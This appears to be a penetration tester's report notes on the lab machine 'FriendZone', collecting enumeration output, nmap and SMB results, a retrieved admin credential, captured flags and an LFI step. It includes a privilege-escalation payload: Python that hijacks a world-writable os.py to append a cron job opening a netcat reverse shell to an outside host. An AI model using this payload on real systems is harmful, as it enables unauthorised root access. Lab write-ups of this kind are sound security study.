[-] /etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Jan 23 2019 .
drwxr-xr-x 90 root root 4096 Jan 23 2019 ..
-rwxr-xr-x 1 root root 2489 Jun 27 2018 apache-htcacheclean
-rwxr-xr-x 1 root root 8181 Jun 27 2018 apache2
-rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor
-rwxr-xr-x 1 root root 3431 Mar 23 2018 bind9
-rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh
-rwxr-xr-x 1 root root 3049 Nov 16 2017 cron
-rwxr-xr-x 1 root root 2813 Nov 16 2017 dbus
-rwxr-xr-x 1 root root 6754 Jan 28 2018 exim4
-rwxr-xr-x 1 root root 985 Jul 13 2018 grub-common
-rwxr-xr-x 1 root root 3809 Feb 15 2018 hwclock.sh
-rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance
-rwxr-xr-x 1 root root 1479 Feb 16 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod
-rwxr-xr-x 1 root root 4597 Nov 25 2016 networking
-rwxr-xr-x 1 root root 1938 Apr 18 2018 nmbd
-rwxr-xr-x 1 root root 1846 Sep 10 2018 open-vm-tools
-rwxr-xr-x 1 root root 1366 Jan 17 2018 plymouth
-rwxr-xr-x 1 root root 752 Jan 17 2018 plymouth-log
-rwxr-xr-x 1 root root 1191 Jan 18 2018 procps
-rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync
-rwxr-xr-x 1 root root 2864 Jan 14
2018 rsyslog
-rwxr-xr-x 1 root root 2263 Apr 18 2018 samba-ad-dc
-rwxr-xr-x 1 root root 1879 Apr 18 2018 smbd
-rwxr-xr-x 1 root root 3837 Jan 26 2018 ssh
-rwxr-xr-x 1 root root 5974 Apr 20 2018 udev
-rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw
-rwxr-xr-x 1 root root 1306 May 16 2018 uuidd
-rwxr-xr-x 1 root root 2069 Aug 29 2016 vsftpd

[-] /lib/systemd/* config file permissions:

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.21p2

[-] Apache version:
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2018-10-03T14:41:08

[-] Apache user configuration:
APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Action '-M' failed. The Apache error log may have more information. [-] www home dir contents: /var/www/: total 36K drwxr-xr-x 8 root root 4.0K Oct 6 2018 . drwxr-xr-x 12 root root 4.0K Oct 6 2018 .. drwxr-xr-x 3 root root 4.0K Jan 16 2019 admin drwxr-xr-x 4 root^ root 4.0K Oct 6 2018 friendzone drwxr-xr-x 2 root root 4.0K Oct 6 2018 friendzoneportal drwxr-xr-x 2 root root 4.0K Jan 15 2019 friendzoneportaladmin drwxr-xr-x 3 root root 4.0K Oct 6 2018 html -rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf drwxr-xr-x 3 root root 4.0K Oct 6 2018 uploads /var/www/admin: total 28K drwxr-xr-x 3 root root 4.0K Jan 16 2019 . drwxr-xr-x 8 root root 4.0K Oct 6 2018 .. -rw-r--r-- 1 root root 1.2K Jan 16 2019 dashboard.php drwxr-xr-x 2 root root 4.0K Oct 6 2018 images -rw-r--r-- 1 root root 2.9K Oct 6 2018 index.html -rw-r--r-- 1 root root 384 Oct 7 2018 login.php -rw-r--r-- 1 root root 89 Oct 7 2018 timestamp.php /var/www/admin/images: total 420K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 3 root root 4.0K Jan 16 2019 .. -rw-r--r-- 1 root root 12K Aug 31 2015 a.jpg -rw-r--r-- 1 root root 392K May 28 2015 b.jpg /var/www/friendzone: total 2.2M drwxr-xr-x 4 root root 4.0K Oct 6 2018 . drwxr-xr-x 8 root root 4.0K Oct 6 2018_ .. drwxr-xr-x 2 root root 4.0K Oct 6 2018 admin -rw-r--r-- 1 root root 2.1M Mar 14 2017 e.gif -rw-r--r-- 1 root root 238 Oct 6 2018 index.html drwxr-xr-x 3 root root 4.0K Oct 6 2018 js /var/www/friendzone/admin: total 8.0K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 4 root root 4.0K Oct 6 2018 .. /var/www/friendzone/js: total 12K drwxr-xr-x 3 root root 4.0K Oct 6 2018 . drwxr-xr-x 4 root root 4.0K Oct 6 2018 .. drwxr-xr-x 2 root root 4.0K Oct 6 2018 js /var/www/friendzone/js/js: total 12K drwxr-xr-x 2 root root 4.0K Oct 6 2018 . drwxr-xr-x 3 root root 4.0K Oct 6 2018 .. 
-rw-r--r-- 1 root root 716 Oct 6 2018 index.php

/var/www/friendzoneportal:
total 380K
drwxr-xr-x 2 root root 4.0K Oct 6 2018 .
drwxr-xr-x 8 root root 4.0K Oct 6 2018 ..
-rw-r--r-- 1 root root 66 Oct 6 2018 index.html
-rw-r--r-- 1 root root 367K Nov 19 2017 z.gif

/var/www/friendzoneportaladmin:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 15 2019 .
drwxr-xr-x 8 root root 4.0K Oct 6 2018 ..
-rw-r--r-- 1 root root 379 Oct 6 2018 index.html
-rw-r--r-- 1 root root 294 Oct 6 2018 login.php

/var/www/html:
total 60K
drwxr-xr-x 3 root root 4.0K Oct 6 2018 .
drwxr-xr-x 8 root root 4.0K Oct 6 2018 ..
-rw-r--r-- 1 root root 21K Oct 5 2018 fz.jpg
-rw-r--r-- 1 root root 11K Oct 5 2018 index.bak
-rw-r--r-- 1 root root 324 Oct 6 2018 index.html
-rw-r--r-- 1 root root 13 Oct 5 2018 robots.txt
drwxr-xr-x 2 root root 4.0K Oct 5 2018 wordpress

/var/www/html/wordpress:
total 8.0K
drwxr-xr-x 2 root root 4.0K Oct 5 2018 .
drwxr-xr-x 3 root root 4.0K Oct 6 2018 ..

/var/www/uploads:
total 20K
drwxr-xr-x 3 root root 4.0K Oct 6 2018 .
drwxr-xr-x 8 root root 4.0K Oct 6 2018 ..
drwxr-xr-x 2 root root 4.0K Oct 6 2018 files
-rw-r--r-- 1 root root 391 Oct 6 2018 index.html
-rw-r--r-- 1 root root 195 Oct 6 2018 upload.php

/var/www/uploads/files:
total 12K
drwxr-xr-x 2 root root 4.0K Oct 6 2018 .
drwxr-xr-x 3 root root 4.0K Oct 6 2018 ..
-rw-r--r-- 1 root root 0 Oct 6 2018 index.html
-rw-r--r-- 1 root root 20 Oct 6 2018 note

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1513 Oct 6 2018 /etc/passwd
-rw-r--r-- 1 root root 789 Jan 23 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile
-rw-r----- 1 root shadow 994 Oct 10 2018 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 43088 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su
-rwsr-xr-x 1 root root 146128 Nov 30 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 64424 Mar 10 2017 /bin/ping
-rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 18448 Mar 10 2017 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 1140200 Feb 14 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root messagebus 42992 Nov 16 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Feb 10 2018 /usr/lib/openssh/ssh-keysign

[-] SGID files:
-rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Apr 5 2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root ssh 362640 Feb 10 2018 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 30800 May 16 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 Jan 25 2018 /usr/bin/expiry
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 10952 Nov 7 2017 /usr/bin/dotlock.mailutils
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 71816 Jan 25 2018 /usr/bin/chage

[+] Files with POSIX capabilities set:
/usr/bin/mtr-packet = cap_net_raw+ep

[-] World-writable files (excluding /proc and /sys):
-rwxrw-rw- 1 nobody nogroup 5493 Apr 2 16:43 /etc/Development/phprs.php
-rwxrwxrwx 1 www-data www-data 46631 Mar 23 03:36 /tmp/LinEnum.sh
-rw-rw-rw- 1 www-data www-data 73679 Apr 2 17:01 /tmp/output.txt
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py

[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=6866a7bf-1c66-4a90-9368-cd99788a8d4a / ext4 errors=remount-ro 0 1
/swapfile none swap sw 0 0

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r--r-- 1 root root 552 Apr 5 2018 /etc/pam.conf
-rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 5898 Oct 5 2018 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 191 Feb 8 2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 144 Oct 5 2018 /etc/kernel-img.conf
-rw-r--r-- 1 root root 2683 Jan 18 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 5850 Feb 5 2018 /etc/vsftpd.conf
-rw-r--r-- 1 root root 3028 Oct 5 2018 /etc/adduser.conf
-rw-r--r-- 1 root root 513 Oct 5 2018 /etc/nsswitch.conf
-rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 350 Oct 5 2018 /etc/popularity-contest.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/friend/.bash_history

[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 1513 Oct 6 2018 /var/backups/passwd.bak
-rw------- 1 root root 789 Jan 23 2019 /var/backups/group.bak
-rw------- 1 root shadow 994 Oct 10 2018 /var/backups/shadow.bak
-rw------- 1 root shadow 659 Jan 23 2019 /var/backups/gshadow.bak
-rw-r--r-- 1 root root 10918 Oct 5 2018 /var/www/html/index.bak

[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 Jan 15 2019 .
drwxr-xr-x 12 root root 4096 Oct 6 2018 ..
-rw-rw---- 1 friend mail 1 Jan 15 2019 friend

### SCAN COMPLETE ####################################

PSPY32S
2020/04/02 17:17:09 CMD: UID=0 PID=1 | /sbin/init splash
2020/04/02 17:18:01 CMD: UID=0 PID=14450 | /usr/bin/python /opt/server_admin/reporter.py
2020/04/02 17:18:01 CMD: UID=0 PID=14449 | /bin/sh -c /opt/server_admin/reporter.py
2020/04/02 17:18:01 CMD: UID=0 PID=14448 | /usr/sbin/CRON -f

root@FriendZone:~# whoami
whoami
root
root@FriendZone:~# ifconfig
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 10.10.10.123 netmask 255.255.255.0 broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:df8e prefixlen 64 scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:df8e prefixlen 64 scopeid 0x0<global>
        ether 00:50:56:b9:df:8e txqueuelen 1000 (Ethernet)
        RX packets 66239 bytes 6095671 (6.0 MB)
        RX errors 0 dropped 99 overruns 0 frame 0
        TX packets 42031 bytes 6032466 (6.0 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
        device interrupt 19 base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 55224 bytes 3756276 (3.7 MB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 55224 bytes 3756276 (3.7 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@FriendZone:~# cat /root/root.txt
cat /root/root.txt
b0e6c60b82cf96e9855ac1656a9e90c7
root@FriendZone:~# cat /home/friend/user.txt
cat /home/friend/user.txt
a9ed20acecd6c5b6b52f474e15ae9a11
root@FriendZone:~#

reporter.py and os.py
Vulnerability Type: Permissions configuration
Exploit POC:
Description:
Discovery of Vulnerability
PSPY32S Output in “Script Results”
Exploit Code Used
Replace /usr/lib/python2.7/os.py with
shell = '''
* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f
'''
f = open('/etc/crontab','a')
f.write(shell)
f.close()
Wait for cron job to run reporter.py
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

ndZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> dir
  . D 0 Wed Jan 16 15:10:51 2019
  .. D 0 Wed Jan 23 16:51:02 2019
  creds.txt N 57 Tue Oct 9 19:52:42 2018

  9221460 blocks of size 1024. 6458412 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
kali@kali:~/Friendzone$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#

Running Processes
Process List

File System
Writeable Files\Directories
Directory List

:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m42s, deviation: 1h43m55s, median: 17s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-04-02T03:49:33+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-02T00:49:33
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.96 seconds

Exploitation
Service Exploited: SMB and PHP Parameter Validation
Vulnerability Type: Local File Inclusion LFI
Exploit POC:
Description:
Discovery of Vulnerability
Login to administrator1.friendzone.red
Exploit Code Used
pagename = /etc/Development/php-reverse-shell
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel